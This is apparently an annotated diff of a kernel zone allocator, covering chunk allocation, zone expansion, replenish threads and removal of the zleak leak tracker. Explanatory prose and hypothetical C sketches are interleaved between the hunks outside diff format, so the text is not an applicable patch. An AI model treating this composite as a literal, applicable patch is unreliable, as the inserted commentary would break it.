+       kr = kernel_memory_allocate(zone_submap(zone), &addr, ptoa(pages),
+           0, kmaflags, VM_KERN_MEMORY_ZONE);
+       if (kr != KERN_SUCCESS) {
+               panic("kernel_memory_allocate() of %u pages failed", pages);
+       }
+
+       zone_meta_populate(addr, ptoa(pages));
+       zcram(zone, addr, pages, ZONE_ADDR_NATIVE);
+}
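
As a hedged usage illustration (the zone, struct, and element count are hypothetical and only show the calling pattern), a fixed-size zone that never grows could be pre-filled once during early boot:

    /* Hypothetical: a small lookup-table zone sized once and never expanded. */
    struct hypo_entry {
        uint64_t key;
        uint64_t val;
    };

    ZONE_DECLARE(hypo_table_zone, "hypo.table",
        sizeof(struct hypo_entry), ZC_NOGC);

    static void
    hypo_table_startup(void)
    {
        /* called once during early boot: wire enough chunks for 1024 elements */
        zone_fill_initially(hypo_table_zone, 1024);
    }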
+
+static vm_offset_t
+zone_allocate_va(zone_t z, zalloc_flags_t flags)
+{
+       kma_flags_t kmaflags = zone_kma_flags(z, flags) | KMA_VAONLY;
+       vm_size_t size = ptoa(z->z_chunk_pages);
+       kern_return_t kr;
+       vm_offset_t addr;
+
+       kr = kernel_memory_allocate(zone_submap(z), &addr, size, 0,
+           kmaflags, VM_KERN_MEMORY_ZONE);
+
+#if !__LP64__
+       if (kr == KERN_NO_SPACE && z->z_replenishes) {
+               /*
+                * On 32bit the zone submaps do not have as much VA
+                * available, so use the VA reserved map for this
+                * purpose.
+                */
+               vm_map_t map = zone_submaps[Z_SUBMAP_IDX_VA_RESERVE];
+               kr = kernel_memory_allocate(map, &addr, size, 0,
+                   kmaflags, VM_KERN_MEMORY_ZONE);
+       }
+#endif
+
+       if (kr == KERN_SUCCESS) {
+#if ZALLOC_EARLY_GAPS
+               if (__improbable(zone_caching_disabled < 0)) {
+                       zone_allocate_random_early_gap(z);
+               }
+#endif /* ZALLOC_EARLY_GAPS */
+               zone_meta_populate(addr, size);
+               return addr;
+       }
 
+       panic_include_zprint = TRUE;
 #if CONFIG_ZLEAKS
+       if ((zleak_state & ZLEAK_STATE_ACTIVE)) {
+               panic_include_ztrace = TRUE;
+       }
+#endif /* CONFIG_ZLEAKS */
+       zone_t zone_largest = zone_find_largest();
+       panic("zalloc: zone map exhausted while allocating from zone [%s%s], "
+           "likely due to memory leak in zone [%s%s] "
+           "(%luM, %d elements allocated)",
+           zone_heap_name(z), zone_name(z),
+           zone_heap_name(zone_largest), zone_name(zone_largest),
+           (unsigned long)zone_size_wired(zone_largest) >> 20,
+           zone_count_allocated(zone_largest));
+}
 
-/*
- * The zone leak detector, abbreviated 'zleak', keeps track of a subset of the currently outstanding
- * allocations made by the zone allocator.  Every zleak_sample_factor allocations in each zone, we capture a
- * backtrace.  Every free, we examine the table and determine if the allocation was being tracked,
- * and stop tracking it if it was being tracked.
- *
- * We track the allocations in the zallocations hash table, which stores the address that was returned from
- * the zone allocator.  Each stored entry in the zallocations table points to an entry in the ztraces table, which
- * stores the backtrace associated with that allocation.  This provides uniquing for the relatively large
- * backtraces - we don't store them more than once.
- *
- * Data collection begins when the zone map is 50% full, and only occurs for zones that are taking up
- * a large amount of virtual space.
- */
-#define ZLEAK_STATE_ENABLED             0x01    /* Zone leak monitoring should be turned on if zone_map fills up. */
-#define ZLEAK_STATE_ACTIVE              0x02    /* We are actively collecting traces. */
-#define ZLEAK_STATE_ACTIVATING          0x04    /* Some thread is doing setup; others should move along. */
-#define ZLEAK_STATE_FAILED              0x08    /* Attempt to allocate tables failed.  We will not try again. */
-uint32_t        zleak_state = 0;                /* State of collection, as above */
+static bool
+zone_expand_pred_nope(__unused zone_t z)
+{
+       return false;
+}
 
-boolean_t       panic_include_ztrace    = FALSE;        /* Enable zleak logging on panic */
-vm_size_t       zleak_global_tracking_threshold;        /* Size of zone map at which to start collecting data */
-vm_size_t       zleak_per_zone_tracking_threshold;      /* Size a zone will have before we will collect data on it */
-unsigned int    zleak_sample_factor     = 1000;         /* Allocations per sample attempt */
+static inline void
+ZONE_TRACE_VM_KERN_REQUEST_START(vm_size_t size)
+{
+#if DEBUG || DEVELOPMENT
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_START,
+           size, 0, 0, 0);
+#else
+       (void)size;
+#endif
+}
 
-/*
- * Counters for allocation statistics.
- */
+static inline void
+ZONE_TRACE_VM_KERN_REQUEST_END(uint32_t pages)
+{
+#if DEBUG || DEVELOPMENT
+       task_t task = current_task();
+       if (pages && task) {
+               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, pages);
+       }
+       VM_DEBUG_CONSTANT_EVENT(vm_kern_request, VM_KERN_REQUEST, DBG_FUNC_END,
+           pages, 0, 0, 0);
+#else
+       (void)pages;
+#endif
+}
+
+static void
+zone_expand_locked(zone_t z, zalloc_flags_t flags, bool (*pred)(zone_t))
+{
+       thread_t self = current_thread();
+       bool vm_priv = (self->options & TH_OPT_VMPRIV);
+       bool clear_vm_priv;
+
+       for (;;) {
+               if (!pred) {
+                       /* NULL pred means "try just once" */
+                       pred = zone_expand_pred_nope;
+               } else if (!pred(z)) {
+                       return;
+               }
+
+               if (vm_priv && !z->z_expander_vm_priv) {
+                       /*
+                        * Claim the vm priv overcommit slot
+                        *
+                        * We do not track exact ownership for VM privileged
+                        * threads, so use the rwlock boost as a stop-gap
+                        * just in case.
+                        */
+                       set_thread_rwlock_boost();
+                       z->z_expander_vm_priv = true;
+                       clear_vm_priv = true;
+               } else {
+                       clear_vm_priv = false;
+               }
 
-/* Times two active records want to occupy the same spot */
-unsigned int z_alloc_collisions = 0;
-unsigned int z_trace_collisions = 0;
+               if (z->z_expander == NULL) {
+                       z->z_expander = self;
+                       break;
+               }
+               if (clear_vm_priv) {
+                       break;
+               }
 
-/* Times a new record lands on a spot previously occupied by a freed allocation */
-unsigned int z_alloc_overwrites = 0;
-unsigned int z_trace_overwrites = 0;
+               if (flags & Z_NOPAGEWAIT) {
+                       return;
+               }
 
-/* Times a new alloc or trace is put into the hash table */
-unsigned int z_alloc_recorded   = 0;
-unsigned int z_trace_recorded   = 0;
+               z->z_expanding_wait = true;
+               lck_spin_sleep_with_inheritor(&z->z_lock, LCK_SLEEP_DEFAULT,
+                   &z->z_expander, z->z_expander,
+                   TH_UNINT, TIMEOUT_WAIT_FOREVER);
+       }
 
-/* Times zleak_log returned false due to not being able to acquire the lock */
-unsigned int z_total_conflicts  = 0;
+       do {
+               struct zone_page_metadata *meta = NULL;
+               uint32_t new_va = 0, cur_pages = 0, min_pages = 0, pages = 0;
+               vm_page_t page_list = NULL;
+               vm_offset_t addr = 0;
+               int waited = 0;
 
-/*
- * Structure for keeping track of an allocation
- * An allocation bucket is in use if its element is not NULL
- */
-struct zallocation {
-       uintptr_t               za_element;             /* the element that was zalloc'ed or zfree'ed, NULL if bucket unused */
-       vm_size_t               za_size;                        /* how much memory did this allocation take up? */
-       uint32_t                za_trace_index; /* index into ztraces for backtrace associated with allocation */
-       /* TODO: #if this out */
-       uint32_t                za_hit_count;           /* for determining effectiveness of hash function */
-};
+               /*
+                * While we hold the zone lock, look if there's VA we can:
+                * - complete from partial pages,
+                * - reuse from the sequester list.
+                *
+                * When the page is being populated we pretend we allocated
+                * an extra element so that zone_gc() can't attempt to free
+                * the chunk (as it could become empty while we wait for pages).
+                */
+               if (!zone_pva_is_null(z->z_pageq_va)) {
+                       meta = zone_meta_queue_pop_native(z,
+                           &z->z_pageq_va, &addr);
+                       if (meta->zm_chunk_len == ZM_SECONDARY_PAGE) {
+                               cur_pages = meta->zm_page_index;
+                               meta -= cur_pages;
+                               addr -= ptoa(cur_pages);
+                               zone_meta_lock_in_partial(z, meta, cur_pages);
+                       }
+               }
+               zone_unlock(z);
 
-/* Size must be a power of two for the zhash to be able to just mask off bits instead of mod */
-uint32_t zleak_alloc_buckets = CONFIG_ZLEAK_ALLOCATION_MAP_NUM;
-uint32_t zleak_trace_buckets = CONFIG_ZLEAK_TRACE_MAP_NUM;
+               /*
+                * Do the zone leak activation here because zleak_activate()
+                * may block, and can't be done on the way out.
+                *
+                * Trigger jetsams via the vm_pageout_garbage_collect thread if
+                * we're running out of zone memory
+                */
+               zleak_activate_if_needed();
+               if (zone_map_nearing_exhaustion()) {
+                       thread_wakeup((event_t)&vm_pageout_garbage_collect);
+               }
 
-vm_size_t zleak_max_zonemap_size;
+               /*
+                * And now allocate pages to populate our VA.
+                */
+               if (z->z_percpu) {
+                       min_pages = z->z_chunk_pages;
+               } else {
+                       min_pages = (uint32_t)atop(round_page(zone_elem_size(z)));
+               }
 
-/* Hashmaps of allocations and their corresponding traces */
-static struct zallocation*      zallocations;
-static struct ztrace*           ztraces;
+               ZONE_TRACE_VM_KERN_REQUEST_START(ptoa(z->z_chunk_pages - cur_pages));
 
-/* not static so that panic can see this, see kern/debug.c */
-struct ztrace*                          top_ztrace;
+               while (pages < z->z_chunk_pages - cur_pages) {
+                       vm_page_t m = vm_page_grab();
 
-/* Lock to protect zallocations, ztraces, and top_ztrace from concurrent modification. */
-LCK_GRP_DECLARE(zleak_lock_grp, "zleak_lock");
-LCK_SPIN_DECLARE(zleak_lock, &zleak_lock_grp);
+                       if (m) {
+                               pages++;
+                               m->vmp_snext = page_list;
+                               page_list = m;
+                               vm_page_zero_fill(m);
+                               continue;
+                       }
 
-/*
- * Initializes the zone leak monitor.  Called from zone_init()
- */
-__startup_func
-static void
-zleak_init(vm_size_t max_zonemap_size)
-{
-       char                    scratch_buf[16];
-       boolean_t               zleak_enable_flag = FALSE;
+                       if (pages >= min_pages && (vm_pool_low() || waited)) {
+                               break;
+                       }
 
-       zleak_max_zonemap_size = max_zonemap_size;
-       zleak_global_tracking_threshold = max_zonemap_size / 2;
-       zleak_per_zone_tracking_threshold = zleak_global_tracking_threshold / 8;
+                       if ((flags & Z_NOPAGEWAIT) == 0) {
+                               waited++;
+                               VM_PAGE_WAIT();
+                               continue;
+                       }
 
-#if CONFIG_EMBEDDED
-       if (PE_parse_boot_argn("-zleakon", scratch_buf, sizeof(scratch_buf))) {
-               zleak_enable_flag = TRUE;
-               printf("zone leak detection enabled\n");
-       } else {
-               zleak_enable_flag = FALSE;
-               printf("zone leak detection disabled\n");
-       }
-#else /* CONFIG_EMBEDDED */
-       /* -zleakoff (flag to disable zone leak monitor) */
-       if (PE_parse_boot_argn("-zleakoff", scratch_buf, sizeof(scratch_buf))) {
-               zleak_enable_flag = FALSE;
-               printf("zone leak detection disabled\n");
-       } else {
-               zleak_enable_flag = TRUE;
-               printf("zone leak detection enabled\n");
-       }
-#endif /* CONFIG_EMBEDDED */
+                       /*
+                        * Undo everything and bail out:
+                        *
+                        * - free pages
+                        * - undo the fake allocation if any
+                        * - put the VA back on the VA page queue.
+                        */
+                       vm_page_free_list(page_list, FALSE);
+                       ZONE_TRACE_VM_KERN_REQUEST_END(pages);
 
-       /* zfactor=XXXX (override how often to sample the zone allocator) */
-       if (PE_parse_boot_argn("zfactor", &zleak_sample_factor, sizeof(zleak_sample_factor))) {
-               printf("Zone leak factor override: %u\n", zleak_sample_factor);
-       }
+                       zone_lock(z);
 
-       /* zleak-allocs=XXXX (override number of buckets in zallocations) */
-       if (PE_parse_boot_argn("zleak-allocs", &zleak_alloc_buckets, sizeof(zleak_alloc_buckets))) {
-               printf("Zone leak alloc buckets override: %u\n", zleak_alloc_buckets);
-               /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */
-               if (zleak_alloc_buckets == 0 || (zleak_alloc_buckets & (zleak_alloc_buckets - 1))) {
-                       printf("Override isn't a power of two, bad things might happen!\n");
+                       if (cur_pages) {
+                               zone_meta_unlock_from_partial(z, meta, cur_pages);
+                       }
+                       if (meta) {
+                               zone_meta_queue_push(z, &z->z_pageq_va,
+                                   meta + cur_pages);
+                       }
+                       goto page_shortage;
                }
-       }
 
-       /* zleak-traces=XXXX (override number of buckets in ztraces) */
-       if (PE_parse_boot_argn("zleak-traces", &zleak_trace_buckets, sizeof(zleak_trace_buckets))) {
-               printf("Zone leak trace buckets override: %u\n", zleak_trace_buckets);
-               /* uses 'is power of 2' trick: (0x01000 & 0x00FFF == 0) */
-               if (zleak_trace_buckets == 0 || (zleak_trace_buckets & (zleak_trace_buckets - 1))) {
-                       printf("Override isn't a power of two, bad things might happen!\n");
+               /*
+                * If we didn't find pre-allocated VA, then allocate a chunk
+                * of VA here.
+                */
+               if (addr == 0) {
+                       addr = zone_allocate_va(z, flags);
+                       meta = zone_meta_from_addr(addr);
+                       new_va = z->z_chunk_pages;
                }
-       }
 
-       if (zleak_enable_flag) {
-               zleak_state = ZLEAK_STATE_ENABLED;
-       }
-}
+               kernel_memory_populate_with_pages(zone_submap(z),
+                   addr + ptoa(cur_pages), ptoa(pages), page_list,
+                   zone_kma_flags(z, flags), VM_KERN_MEMORY_ZONE);
 
-/*
- * Support for kern.zleak.active sysctl - a simplified
- * version of the zleak_state variable.
- */
-int
-get_zleak_state(void)
-{
-       if (zleak_state & ZLEAK_STATE_FAILED) {
-               return -1;
+               ZONE_TRACE_VM_KERN_REQUEST_END(pages);
+
+               zcram_and_lock(z, addr, new_va, cur_pages, cur_pages + pages,
+                   ZONE_ADDR_NATIVE);
+       } while (pred(z));
+
+page_shortage:
+       zleak_track_if_needed(z);
+
+       if (clear_vm_priv) {
+               z->z_expander_vm_priv = false;
+               clear_thread_rwlock_boost();
        }
-       if (zleak_state & ZLEAK_STATE_ACTIVE) {
-               return 1;
+       if (z->z_expander == self) {
+               z->z_expander = THREAD_NULL;
+       }
+       if (z->z_expanding_wait) {
+               z->z_expanding_wait = false;
+               wakeup_all_with_inheritor(&z->z_expander, THREAD_AWAKENED);
        }
-       return 0;
 }
 
-kern_return_t
-zleak_activate(void)
+static bool
+zalloc_needs_refill(zone_t zone)
 {
-       kern_return_t retval;
-       vm_size_t z_alloc_size = zleak_alloc_buckets * sizeof(struct zallocation);
-       vm_size_t z_trace_size = zleak_trace_buckets * sizeof(struct ztrace);
-       void *allocations_ptr = NULL;
-       void *traces_ptr = NULL;
-
-       /* Only one thread attempts to activate at a time */
-       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
-               return KERN_SUCCESS;
+       if (zone->z_elems_free > zone->z_elems_rsv) {
+               return false;
        }
-
-       /* Indicate that we're doing the setup */
-       lck_spin_lock(&zleak_lock);
-       if (zleak_state & (ZLEAK_STATE_ACTIVE | ZLEAK_STATE_ACTIVATING | ZLEAK_STATE_FAILED)) {
-               lck_spin_unlock(&zleak_lock);
-               return KERN_SUCCESS;
+       if (zone->z_wired_cur < zone->z_wired_max) {
+               return true;
        }
-
-       zleak_state |= ZLEAK_STATE_ACTIVATING;
-       lck_spin_unlock(&zleak_lock);
-
-       /* Allocate and zero tables */
-       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&allocations_ptr, z_alloc_size, VM_KERN_MEMORY_OSFMK);
-       if (retval != KERN_SUCCESS) {
-               goto fail;
+       if (zone->exhaustible) {
+               return false;
        }
-
-       retval = kmem_alloc_kobject(kernel_map, (vm_offset_t*)&traces_ptr, z_trace_size, VM_KERN_MEMORY_OSFMK);
-       if (retval != KERN_SUCCESS) {
-               goto fail;
+       if (zone->expandable) {
+               /*
+                * If we're expandable, just don't go through this again.
+                */
+               zone->z_wired_max = ~0u;
+               return true;
        }
+       zone_unlock(zone);
 
-       bzero(allocations_ptr, z_alloc_size);
-       bzero(traces_ptr, z_trace_size);
-
-       /* Everything's set.  Install tables, mark active. */
-       zallocations = allocations_ptr;
-       ztraces = traces_ptr;
-
-       /*
-        * Initialize the top_ztrace to the first entry in ztraces,
-        * so we don't have to check for null in zleak_log
-        */
-       top_ztrace = &ztraces[0];
+       panic_include_zprint = true;
+#if CONFIG_ZLEAKS
+       if (zleak_state & ZLEAK_STATE_ACTIVE) {
+               panic_include_ztrace = true;
+       }
+#endif /* CONFIG_ZLEAKS */
+       panic("zone '%s%s' exhausted", zone_heap_name(zone), zone_name(zone));
+}
 
-       /*
-        * Note that we do need a barrier between installing
-        * the tables and setting the active flag, because the zfree()
-        * path accesses the table without a lock if we're active.
-        */
-       lck_spin_lock(&zleak_lock);
-       zleak_state |= ZLEAK_STATE_ACTIVE;
-       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
-       lck_spin_unlock(&zleak_lock);
+static void
+zone_expand_async(__unused thread_call_param_t p0, __unused thread_call_param_t p1)
+{
+       zone_foreach(z) {
+               if (z->no_callout) {
+                       /* z_async_refilling will never be set */
+                       continue;
+               }
 
-       return 0;
+               if (z->z_replenishes) {
+                       /* those use the zone_replenish_thread */
+                       continue;
+               }
 
-fail:
-       /*
-        * If we fail to allocate memory, don't further tax
-        * the system by trying again.
-        */
-       lck_spin_lock(&zleak_lock);
-       zleak_state |= ZLEAK_STATE_FAILED;
-       zleak_state &= ~ZLEAK_STATE_ACTIVATING;
-       lck_spin_unlock(&zleak_lock);
+               zone_lock(z);
+               if (z->z_self && z->z_async_refilling) {
+                       z->z_async_refilling = false;
+                       zone_expand_locked(z, Z_WAITOK, zalloc_needs_refill);
+               }
+               zone_unlock(z);
+       }
+}
 
-       if (allocations_ptr != NULL) {
-               kmem_free(kernel_map, (vm_offset_t)allocations_ptr, z_alloc_size);
+static inline void
+zone_expand_async_schedule_if_needed(zone_t zone)
+{
+       if (zone->z_elems_free > zone->z_elems_rsv || zone->z_async_refilling ||
+           zone->no_callout) {
+               return;
        }
 
-       if (traces_ptr != NULL) {
-               kmem_free(kernel_map, (vm_offset_t)traces_ptr, z_trace_size);
+       if (!zone->expandable && zone->z_wired_cur >= zone->z_wired_max) {
+               return;
        }
 
-       return retval;
+       if (zone->z_elems_free == 0 || !vm_pool_low()) {
+               zone->z_async_refilling = true;
+               thread_call_enter(&zone_expand_callout);
+       }
 }
 
-/*
- * TODO: What about allocations that never get deallocated,
- * especially ones with unique backtraces? Should we wait to record
- * until after boot has completed?
- * (How many persistent zallocs are there?)
- */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone replenishing (VM allocations)
+#if !ZALLOC_TEST
 
 /*
- * This function records the allocation in the allocations table,
- * and stores the associated backtrace in the traces table
- * (or just increments the refcount if the trace is already recorded)
- * If the allocation slot is in use, the old allocation is replaced with the new allocation, and
- * the associated trace's refcount is decremented.
- * If the trace slot is in use, it returns.
- * The refcount is incremented by the amount of memory the allocation consumes.
- * The return value indicates whether to try again next time.
+ * Tracks how many zone_replenish threads are active, because zone_gc() wants
+ * for those to be finished before it proceeds.
+ *
+ * This counts how many replenish threads are active in
+ * ZONE_REPLENISH_ACTIVE_INC increments,
+ * and uses the low bit to track if there are any waiters.
  */
-static boolean_t
-zleak_log(uintptr_t* bt,
-    uintptr_t addr,
-    uint32_t depth,
-    vm_size_t allocation_size)
+#define ZONE_REPLENISH_ACTIVE_NONE        0u
+#define ZONE_REPLENISH_ACTIVE_WAITER_BIT  1u
+#define ZONE_REPLENISH_ACTIVE_INC         2u
+#define ZONE_REPLENISH_ACTIVE_MASK        (~ZONE_REPLENISH_ACTIVE_WAITER_BIT)
+static unsigned _Atomic zone_replenish_active;
+static unsigned zone_replenish_wakeups;
+static unsigned zone_replenish_wakeups_initiated;
+static unsigned zone_replenish_throttle_count;
+
+#define ZONE_REPLENISH_TARGET (16 * 1024)
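
To make the encoding above concrete, here is a stand-alone sketch (user space, made-up sequence of events) of how the counter packs the active count in multiples of ZONE_REPLENISH_ACTIVE_INC with the waiter flag in bit 0:

    #include <assert.h>
    #include <stdio.h>

    #define ACTIVE_NONE        0u
    #define ACTIVE_WAITER_BIT  1u
    #define ACTIVE_INC         2u
    #define ACTIVE_MASK        (~ACTIVE_WAITER_BIT)

    int
    main(void)
    {
        unsigned v = ACTIVE_NONE;

        v += ACTIVE_INC;          /* first replenish thread goes active    */
        v += ACTIVE_INC;          /* second replenish thread goes active   */
        v |= ACTIVE_WAITER_BIT;   /* zone_reclaim() registers as a waiter  */

        assert(((v & ACTIVE_MASK) / ACTIVE_INC) == 2); /* two active threads */
        assert(v & ACTIVE_WAITER_BIT);                 /* someone is waiting */

        v -= 2 * ACTIVE_INC;      /* both threads finish their pass        */
        if ((v & ACTIVE_MASK) == 0) {
            v = ACTIVE_NONE;      /* last one out clears the waiter bit... */
            printf("...and would thread_wakeup(&zone_replenish_active)\n");
        }
        return 0;
    }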
+
+static void
+zone_replenish_wait_if_needed(void)
 {
-       /* Quit if there's someone else modifying the hash tables */
-       if (!lck_spin_try_lock(&zleak_lock)) {
-               z_total_conflicts++;
-               return FALSE;
+       /*
+        * This check can be racy; the reserves ought to be enough
+        * to compensate for a little race
+        */
+       while (os_atomic_load(&zone_replenish_active, relaxed) !=
+           ZONE_REPLENISH_ACTIVE_NONE) {
+               unsigned o_active, n_active;
+
+               assert_wait(&zone_replenish_active, THREAD_UNINT);
+
+               os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, {
+                       if (o_active == ZONE_REPLENISH_ACTIVE_NONE) {
+                               os_atomic_rmw_loop_give_up({
+                                       clear_wait(current_thread(), THREAD_AWAKENED);
+                                       return;
+                               });
+                       }
+                       if (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT) {
+                               os_atomic_rmw_loop_give_up(break);
+                       }
+                       n_active = o_active | ZONE_REPLENISH_ACTIVE_WAITER_BIT;
+               });
+               thread_block(THREAD_CONTINUE_NULL);
        }
+}
 
-       struct zallocation* allocation  = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
-
-       uint32_t trace_index = hashbacktrace(bt, depth, zleak_trace_buckets);
-       struct ztrace* trace = &ztraces[trace_index];
+__attribute__((noinline))
+static void
+zone_replenish_locked(zone_t zone)
+{
+       thread_t thr = current_thread();
+       uint32_t min_free;
 
-       allocation->za_hit_count++;
-       trace->zt_hit_count++;
+       zone_replenish_wakeups++;
 
        /*
-        * If the allocation bucket we want to be in is occupied, and if the occupier
-        * has the same trace as us, just bail.
+        * We'll let threads continue to allocate under the reserve:
+        * - until it is depleted to 50% for regular threads,
+        * - until it is depleted to 25% for VM_PRIV threads.
+        *
+        * After that only TH_OPT_ZONE_PRIV threads may continue.
         */
-       if (allocation->za_element != (uintptr_t) 0 && trace_index == allocation->za_trace_index) {
-               z_alloc_collisions++;
-
-               lck_spin_unlock(&zleak_lock);
-               return TRUE;
+       if (thr->options & TH_OPT_VMPRIV) {
+               min_free = zone->z_elems_rsv / 4;
+       } else {
+               min_free = zone->z_elems_rsv / 2;
        }
 
-       /* STEP 1: Store the backtrace in the traces array. */
-       /* A size of zero indicates that the trace bucket is free. */
-
-       if (trace->zt_size > 0 && bcmp(trace->zt_stack, bt, (depth * sizeof(uintptr_t))) != 0) {
+       while (zone->z_elems_free <= zone->z_elems_rsv) {
                /*
-                * Different unique trace with same hash!
-                * Just bail - if we're trying to record the leaker, hopefully the other trace will be deallocated
-                * and get out of the way for later chances
+                * Wakeup the replenish thread if not running.
                 */
-               trace->zt_collisions++;
-               z_trace_collisions++;
-
-               lck_spin_unlock(&zleak_lock);
-               return TRUE;
-       } else if (trace->zt_size > 0) {
-               /* Same trace, already added, so increment refcount */
-               trace->zt_size += allocation_size;
-       } else {
-               /* Found an unused trace bucket, record the trace here! */
-               if (trace->zt_depth != 0) { /* if this slot was previously used but not currently in use */
-                       z_trace_overwrites++;
+               if (!zone->z_async_refilling) {
+                       os_atomic_add(&zone_replenish_active,
+                           ZONE_REPLENISH_ACTIVE_INC, relaxed);
+                       zone->z_async_refilling = true;
+                       zone_replenish_wakeups_initiated++;
+                       thread_wakeup(&zone->z_elems_rsv);
                }
 
-               z_trace_recorded++;
-               trace->zt_size                  = allocation_size;
-               memcpy(trace->zt_stack, bt, (depth * sizeof(uintptr_t)));
-
-               trace->zt_depth         = depth;
-               trace->zt_collisions    = 0;
-       }
-
-       /* STEP 2: Store the allocation record in the allocations array. */
+               if (zone->z_elems_free > min_free) {
+                       break;
+               }
 
-       if (allocation->za_element != (uintptr_t) 0) {
                /*
-                * Straight up replace any allocation record that was there.  We don't want to do the work
-                * to preserve the allocation entries that were there, because we only record a subset of the
-                * allocations anyways.
+                * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish
+                * thread itself.
+                *
+                * Replenish threads *need* to use the reserve. GC threads need
+                * to get through the current allocation, but then will wait at
+                * a higher level after they've dropped any locks which would
+                * deadlock the replenish thread.
+                *
+                * The min_free floor computed above (half or a quarter of
+                * z_elems_rsv) should have left us headroom even though this
+                * thread didn't wait.
                 */
+               if (thr->options & TH_OPT_ZONE_PRIV) {
+                       assert(zone->z_elems_free != 0);
+                       break;
+               }
 
-               z_alloc_collisions++;
-
-               struct ztrace* associated_trace = &ztraces[allocation->za_trace_index];
-               /* Knock off old allocation's size, not the new allocation */
-               associated_trace->zt_size -= allocation->za_size;
-       } else if (allocation->za_trace_index != 0) {
-               /* Slot previously used but not currently in use */
-               z_alloc_overwrites++;
-       }
-
-       allocation->za_element          = addr;
-       allocation->za_trace_index      = trace_index;
-       allocation->za_size             = allocation_size;
+               if (startup_phase < STARTUP_SUB_MACH_IPC) {
+                       panic("vm_map_steal_memory didn't steal enough memory: "
+                           "trying to grow [%s%s] before the scheduler has started",
+                           zone_heap_name(zone), zone_name(zone));
+               }
 
-       z_alloc_recorded++;
+               /*
+                * Wait for the replenish threads to add more elements
+                * for us to allocate from.
+                */
+               zone_replenish_throttle_count++;
+               zone->z_replenish_wait = true;
+               assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC);
+               zone_unlock(zone);
+               thread_block(THREAD_CONTINUE_NULL);
+               zone_lock(zone);
+               zone->z_replenish_wait = false;
 
-       if (top_ztrace->zt_size < trace->zt_size) {
-               top_ztrace = trace;
+               assert(zone->z_self == zone);
        }
+}
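
Reading the throttling tiers above with made-up numbers (z_elems_rsv = 200): regular threads start waiting once the free count drops to 100 or below, TH_OPT_VMPRIV threads at 50 or below, and TH_OPT_ZONE_PRIV threads (the GC and replenish threads themselves) never wait. A small user-space sketch of that decision, not the kernel's actual code:

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    /* Hypothetical predicate mirroring the tiers in zone_replenish_locked(). */
    static bool
    may_keep_allocating(uint32_t free_count, uint32_t rsv,
        bool vm_priv, bool zone_priv)
    {
        if (zone_priv) {
            return true;    /* GC / replenish threads may drain the reserve */
        }
        return free_count > (vm_priv ? rsv / 4 : rsv / 2);
    }

    int
    main(void)
    {
        uint32_t rsv = 200;    /* made-up z_elems_rsv */

        printf("%d %d %d\n",
            may_keep_allocating(120, rsv, false, false),   /* 1: above 50%    */
            may_keep_allocating(80,  rsv, false, false),   /* 0: at/below 50% */
            may_keep_allocating(80,  rsv, true,  false));  /* 1: above 25%    */
        return 0;
    }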
 
-       lck_spin_unlock(&zleak_lock);
-       return TRUE;
+static bool
+zone_replenish_needed(zone_t z)
+{
+       return z->z_elems_free <= z->z_elems_rsv;
 }
 
 /*
- * Free the allocation record and release the stacktrace.
- * This should be as fast as possible because it will be called for every free.
+ * High priority VM privileged thread used to asynchronously refill a given zone.
+ * These are needed for data structures used by the lower level VM itself. The
+ * replenish thread maintains a reserve of elements, so that the VM will never
+ * block in the zone allocator.
  */
-__attribute__((noinline))
+__dead2
 static void
-zleak_free(uintptr_t addr,
-    vm_size_t allocation_size)
+zone_replenish_thread(void *_z, wait_result_t __unused wr)
 {
-       if (addr == (uintptr_t) 0) {
-               return;
+       unsigned o_active, n_active;
+       zone_t z = _z;
+
+       zone_lock(z);
+       assert(z->z_self == z);
+       assert(z->z_async_refilling && z->z_replenishes);
+
+       zone_expand_locked(z, Z_WAITOK, zone_replenish_needed);
+
+       if (z->z_replenish_wait) {
+               /* Wakeup any potentially throttled allocations */
+               z->z_replenish_wait = false;
+               thread_wakeup(z);
        }
 
-       struct zallocation* allocation = &zallocations[hashaddr(addr, zleak_alloc_buckets)];
+       /* wakeup zone_reclaim() callers that were possibly waiting */
+       os_atomic_rmw_loop(&zone_replenish_active, o_active, n_active, relaxed, {
+               if (os_sub_overflow(o_active, ZONE_REPLENISH_ACTIVE_INC, &n_active)) {
+                       panic("zone_replenish_active corrupt: %d", o_active);
+               }
+               if ((n_active & ZONE_REPLENISH_ACTIVE_MASK) == 0) {
+                       n_active = ZONE_REPLENISH_ACTIVE_NONE;
+               }
+       });
 
-       /* Double-checked locking: check to find out if we're interested, lock, check to make
-        * sure it hasn't changed, then modify it, and release the lock.
-        */
+       if (n_active == ZONE_REPLENISH_ACTIVE_NONE &&
+           (o_active & ZONE_REPLENISH_ACTIVE_WAITER_BIT)) {
+               thread_wakeup(&zone_replenish_active);
+       }
 
-       if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
-               /* if the allocation was the one, grab the lock, check again, then delete it */
-               lck_spin_lock(&zleak_lock);
+       z->z_async_refilling = false;
+       assert_wait(&z->z_elems_rsv, THREAD_UNINT);
 
-               if (allocation->za_element == addr && allocation->za_trace_index < zleak_trace_buckets) {
-                       struct ztrace *trace;
+       zone_unlock(z);
 
-                       /* allocation_size had better match what was passed into zleak_log - otherwise someone is freeing into the wrong zone! */
-                       if (allocation->za_size != allocation_size) {
-                               panic("Freeing as size %lu memory that was allocated with size %lu\n",
-                                   (uintptr_t)allocation_size, (uintptr_t)allocation->za_size);
-                       }
+       thread_block_parameter(zone_replenish_thread, z);
+       __builtin_unreachable();
+}
 
-                       trace = &ztraces[allocation->za_trace_index];
+void
+zone_replenish_configure(zone_t z)
+{
+       thread_t th;
+       kern_return_t kr;
+       char name[MAXTHREADNAMESIZE];
 
-                       /* size of 0 indicates trace bucket is unused */
-                       if (trace->zt_size > 0) {
-                               trace->zt_size -= allocation_size;
-                       }
+       zone_lock(z);
